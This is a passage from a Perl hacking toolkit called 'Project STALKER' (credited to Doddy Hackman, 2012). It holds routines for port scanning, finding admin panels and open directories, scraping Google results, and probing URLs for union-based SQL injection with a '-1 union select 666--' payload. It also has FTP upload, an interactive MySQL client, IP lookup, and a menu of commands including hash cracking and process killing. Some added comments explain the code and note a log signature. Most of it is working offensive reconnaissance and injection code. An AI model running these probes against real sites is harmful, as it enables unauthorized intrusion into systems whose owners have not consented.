  1616. if ( $socket->put( $1, $2 ) ) {
  1617. print "[+] Upload completed";
  1618. }
  1619. else {
  1620. print "\n\n[-] Error\n\n";
  1621. }
  1622. }
  1623.  
  1624. if ( $cmd =~ /quit/ ) {
  1625. next;
  1626. }
  1627.  
  1628. goto menu;
  1629.  
  1630. }
  1631. else {
  1632. print "\n[-] Failed the login\n\n";
  1633. }
  1634.  
  1635. }
  1636. else {
  1637. print "\n\n[-] Error\n\n";
  1638. }
  1639.  
  1640. }
  1641.  
# Look for browsable directories reachable from the page at $_[0].  Every
# link on the page is reduced to its directory part; that URL is fetched
# and, when the body contains "Index Of", printed and appended to
# logs/paths-found.txt via saveyes().
# Only links on the same host (or with no host) are considered.  $url and
# $code are package globals (no `my`).  $auth and $borrar are interpolated
# into regexes unescaped, so a host or file name containing regex
# metacharacters may match unexpectedly — presumably never hit in
# practice, but worth knowing.
sub scanpaths {

my $urla = $_[0];

print "\n[+] Find paths in $urla\n\n\n";
my @urls = repes( get_links( toma($urla) ) );
for $url (@urls) {
my $web = $url;
my ( $scheme, $auth, $path, $query, $frag ) = uri_split($url);
if ( $_[0] =~ /$auth/ or $auth eq "" ) {
# $2.$3 is the file name part ("name.ext") at the end of the path.
if ( $path =~ /(.*)\/(.*)\.(.*)$/ ) {
my $borrar = $2 . "." . $3;
if ( $web =~ /(.*)$borrar/ ) {
my $co = $1;
# Relative link: prefix the starting URL.
unless ( $co =~ /$auth/ ) {
$co = $urla . $co;
}
$code = toma($co);
if ( $code =~ /Index Of/ig ) {
print "[Link] : " . $co . "\n";
saveyes( "logs/paths-found.txt", $co );
}
}
}
}
}
}
  1669.  
  1670. sub scanport {
  1671.  
  1672. my %ports = (
  1673. "21" => "ftp",
  1674. "22" => "ssh",
  1675. "25" => "smtp",
  1676. "80" => "http",
  1677. "110" => "pop3",
  1678. "3306" => "mysql"
  1679. );
  1680.  
  1681. print "[+] Scanning $_[0]\n\n\n";
  1682.  
  1683. for my $port ( keys %ports ) {
  1684.  
  1685. if (
  1686. new IO::Socket::INET(
  1687. PeerAddr => $_[0],
  1688. PeerPort => $port,
  1689. Proto => "tcp",
  1690. Timeout => 0.5
  1691. )
  1692. )
  1693. {
  1694. print "[Port] : " . $port . " [Service] : " . $ports{$port} . "\n";
  1695. }
  1696. }
  1697. print "\n\n[+] Finish\n";
  1698. }
  1699.  
  1700. sub scanpanel {
  1701. print "[+] Scanning $_[0]\n\n\n";
  1702. for $path (@panels) {
  1703. $code = tomax( $_[0] . "/" . $path );
  1704. if ( $code->is_success ) {
  1705. print "[Link] : " . $_[0] . "/" . $path . "\n";
  1706. saveyes( "logs/panel-logs.txt", $_[0] . "/" . $path );
  1707. }
  1708. }
  1709. print "\n\n[+] Finish\n";
  1710. }
  1711.  
# Collect result URLs for the search term $a from google.com.ar, walking
# the result pages start=10,20,... up to $b, and return them de-duplicated
# by repes().  Only links into webcache.googleusercontent.com are kept;
# the real URL is the second field of their "cache:<id>:<url>+" part.
# $pages, @url, @founds and $code are package globals (no `my`), so they
# are not reset between calls.
sub google {
my ( $a, $b ) = @_;
for ( $pages = 10 ; $pages <= $b ; $pages = $pages + 10 ) {
$code = toma(
"http://www.google.com.ar/search?hl=&q=" . $a . "&start=$pages" );
my @links = get_links($code);
for my $l (@links) {
if ( $l =~ /webcache.googleusercontent.com/ ) {
push( @url, $l );
}
}
}

for (@url) {
if ( $_ =~ /cache:(.*?):(.*?)\+/ ) {
push( @founds, $2 );
}
}

# The right-hand @founds is still the global; the lexical only takes
# effect after this statement.
my @founds = repes(@founds);

return @founds;
}
  1735.  
# Probe one URL for a union-based injection point: the fixed suffix
# "-1+union+select+666--" is appended and the response is checked for the
# MySQL column-count error text.  A hit is printed (with a terminal bell)
# and appended to logs/sql-logs.txt via saveyes().  $pass1/$pass2 are
# lexical here and shadow the package globals of the same name; $code1 is
# a package global.
# Detection note: the "union select 666" suffix and the error text below
# are both usable as log signatures for this probe.
sub sql {

my ( $pass1, $pass2 ) = ( "+", "--" );
my $page = shift;
$code1 =
toma( $page . "-1"
. $pass1 . "union"
. $pass1
. "select"
. $pass1 . "666"
. $pass2 );
if ( $code1 =~
/The used SELECT statements have a different number of columns/ig )
{
print "[+] SQLI : $page\a\n";
saveyes( "logs/sql-logs.txt", $page );
}
}
  1754.  
  1755. sub get_links {
  1756.  
  1757. $test = HTML::LinkExtor->new( \&agarrar )->parse( $_[0] );
  1758. return @links;
  1759.  
  1760. sub agarrar {
  1761. my ( $a, %b ) = @_;
  1762. push( @links, values %b );
  1763. }
  1764. }
  1765.  
  1766. sub repes {
  1767. foreach $test (@_) {
  1768. push @limpio, $test unless $repe{$test}++;
  1769. }
  1770. return @limpio;
  1771. }
  1772.  
  1773. sub head {
  1774. cprint "\x0311"; #13
  1775. print "\n\n-- == Project STALKER == --\n\n";
  1776. cprint "\x030";
  1777. }
  1778.  
  1779. sub copyright {
  1780. cprint "\x0311"; #13
  1781. print "\n\n(C) Doddy Hackman 2012\n\n";
  1782. cprint "\x030";
  1783. }
  1784.  
  1785. sub toma {
  1786. return $nave->get( $_[0] )->content;
  1787. }
  1788.  
  1789. sub tomax {
  1790. return $nave->get( $_[0] );
  1791. }
  1792.  
  1793. sub tomar {
  1794. my ( $web, $var ) = @_;
  1795. return $nave->post( $web, [ %{$var} ] )->content;
  1796. }
  1797.  
  1798. sub conectar {
  1799.  
  1800. my $sockex = new IO::Socket::INET(
  1801. PeerAddr => $_[0],
  1802. PeerPort => $_[1],
  1803. Proto => "tcp",
  1804. Timeout => 5
  1805. );
  1806.  
  1807. print $sockex $_[2] . "\r\n";
  1808. $sockex->read( $re, 5000 );
  1809. $sockex->close;
  1810. return $re . "\r\n";
  1811. }
  1812.  
  1813. sub enter {
  1814.  
  1815. my ( $host, $user, $pass ) = @_;
  1816.  
  1817. print "[+] Connecting to the server\n";
  1818.  
  1819. $info = "dbi:mysql::" . $host . ":3306";
  1820. if ( my $enter = DBI->connect( $info, $user, $pass, { PrintError => 0 } ) )
  1821. {
  1822.  
  1823. print "\n[+] Enter in the database";
  1824.  
  1825. while (1) {
  1826. print "\n\n\n[+] Query : ";
  1827. chomp( my $ac = <stdin> );
  1828.  
  1829. if ( $ac eq "exit" ) {
  1830. $enter->disconnect;
  1831. print "\n\n[+] Closing connection\n\n";
  1832. last;
  1833. }
  1834.  
  1835. $re = $enter->prepare($ac);
  1836. $re->execute();
  1837. my $total = $re->rows();
  1838.  
  1839. my @columnas = @{ $re->{NAME} };
  1840.  
  1841. if ( $total eq "-1" ) {
  1842. print "\n\n[-] Query Error\n";
  1843. next;
  1844. }
  1845. else {
  1846. print "\n\n[+] Result of the query\n";
  1847. if ( $total eq 0 ) {
  1848. print "\n\n[+] Not rows returned\n\n";
  1849. }
  1850. else {
  1851. print "\n\n[+] Rows returned : " . $total . "\n\n\n";
  1852. for (@columnas) {
  1853. print $_. "\t\t";
  1854. }
  1855. print "\n\n";
  1856. while ( @row = $re->fetchrow_array ) {
  1857. for (@row) {
  1858. print $_. "\t\t";
  1859. }
  1860. print "\n";
  1861. }
  1862. }
  1863. }
  1864. }
  1865. }
  1866. else {
  1867. print "\n[-] Error connecting\n";
  1868. }
  1869. }
  1870.  
  1871. sub encode {
  1872. my $string = $_[0];
  1873. $hex = '0x';
  1874. for ( split //, $string ) {
  1875. $hex .= sprintf "%x", ord;
  1876. }
  1877. return $hex;
  1878. }
  1879.  
  1880. sub saveyes {
  1881. open( SAVE, ">>" . $_[0] );
  1882. print SAVE $_[1] . "\n";
  1883. close SAVE;
  1884. }
  1885.  
  1886. sub savefile {
  1887. open( SAVE, ">>logs/webs/" . $_[0] );
  1888. print SAVE $_[1] . "\n";
  1889. close SAVE;
  1890. }
  1891.  
  1892. sub coleccionar {
  1893. opendir DIR, $_[0];
  1894. my @archivos = readdir DIR;
  1895. close DIR;
  1896. return @archivos;
  1897. }
  1898.  
# Print location data and reverse-IP host names for $target.  The name is
# resolved to an IPv4 address, a melissadata.com lookup page is scraped
# for City / Country / State, then ip-adress.com's reverse-IP page is
# scraped for host names.  $total and $re are package globals.
# inet_ntoa() on an unresolvable name (gethostbyname returning undef) is
# fatal, so such a target ends the program here.  The second `my $target`
# redeclares the parameter in the same scope (a warning under
# `use warnings`; harmless otherwise).
sub infocon {
my $target = shift;

my $get = gethostbyname($target);
my $target = inet_ntoa($get);

print "[+] Getting info\n\n\n";
$total =
"http://www.melissadata.com/lookups/iplocation.asp?ipaddress=$target";
$re = toma($total);

if ( $re =~ /City<\/td><td align=(.*)><b>(.*)<\/b><\/td>/ ) {
print "[+] City : $2\n";
}
else {
print "[-] Not Found\n";
# Prints the copyright banner here; presumably a leftover — the
# remaining lookups still run afterwards.
copyright();
}
if ( $re =~ /Country<\/td><td align=(.*)><b>(.*)<\/b><\/td>/ ) {
print "[+] Country : $2\n";
}
if ( $re =~ /State or Region<\/td><td align=(.*)><b>(.*)<\/b><\/td>/ ) {
print "[+] State or Region : $2\n";
}

print "\n\n[+] Getting Hosts\n\n\n";

my $code = toma( "http://www.ip-adress.com/reverse_ip/" . $target );

# One "whois/<host>\">Whois" link per host on the reverse-IP page.
while ( $code =~ /whois\/(.*?)\">Whois/g ) {
my $dns = $1;
chomp $dns;
print "[DNS] : $dns\n";
}
}
  1934.  
# Print the command list for the interactive prompt in colour 6
# (Color::Output cprint) and reset the colour afterwards.  The names are
# presumably those dispatched by the menu code elsewhere in this file,
# which is outside this view.
sub helpme {

cprint "\x036";
print qq(

[+] Commands :

[++] getip <host>
[++] getlink <page>
[++] getprocess
[++] killprocess <pid process>
[++] conec <host> <port> <command>
[++] allow <host>
[++] paths <page>
[++] encodehex <text>
[++] decodehex <text>
[++] encodeascii <text>
[++] decodeascii <text>
[++] encodebase <text>
[++] decodebase <text>
[++] scanport <host>
[++] panel <page>
[++] getpass <hash>
[++] kobra <page>
[++] ftp <host> <user> <pass>
[++] mysql <host> <user> <pass>
[++] locate <ip>
[++] whois <dom>
[++] navegator
[++] scangoogle
[++] help
[++] exit
);
cprint "\n\n\n\x030";
}
  1970.  
  1971. #
  1972. # The End ?
  1973. #